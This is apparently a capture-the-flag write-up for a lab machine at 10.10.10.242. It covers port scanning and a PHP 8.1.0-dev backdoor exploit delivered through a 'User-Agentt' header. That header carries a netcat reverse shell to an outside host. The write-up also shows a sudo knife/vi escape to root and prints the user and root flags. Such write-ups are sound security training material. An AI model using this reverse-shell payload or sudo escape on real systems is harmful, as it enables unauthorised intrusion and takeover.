Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.242 | TCP:22,80 |
$ ip='10.10.10.242'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be549ca367c315c364717f6a534a4c21 (RSA)
| 256 bf8a3fd406e92e874ec97eab220ec0ee (ECDSA)
|_ 256 1adea1cc37ce53bb1bfb2b0badb3f684 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PHP 8.1.0-dev RCE
http://10.10.10.242/
$ whatweb http://10.10.10.242/ -v
https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
GET / HTTP/1.1
Host: 10.10.10.242
User-Agentt: zerodiumsystem('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.33 10033 >/tmp/f');
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
User.txt
80543f47be4ae1c71bee32030493ec4d
Privilege Escalation:knife
Knife 是 Chef 配置管理工具的命令行接口(CLI)。Chef 是一个用于自动化服务器配置管理的工具,而 Knife 允许用户与 Chef Server 交互,管理节点、数据包、Cookbook 等。
$ sudo /usr/bin/knife data bag create 1 2 -e vi
:!/bin/bash
Root.txt
15153b6892739327c25a62b7461a5315
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
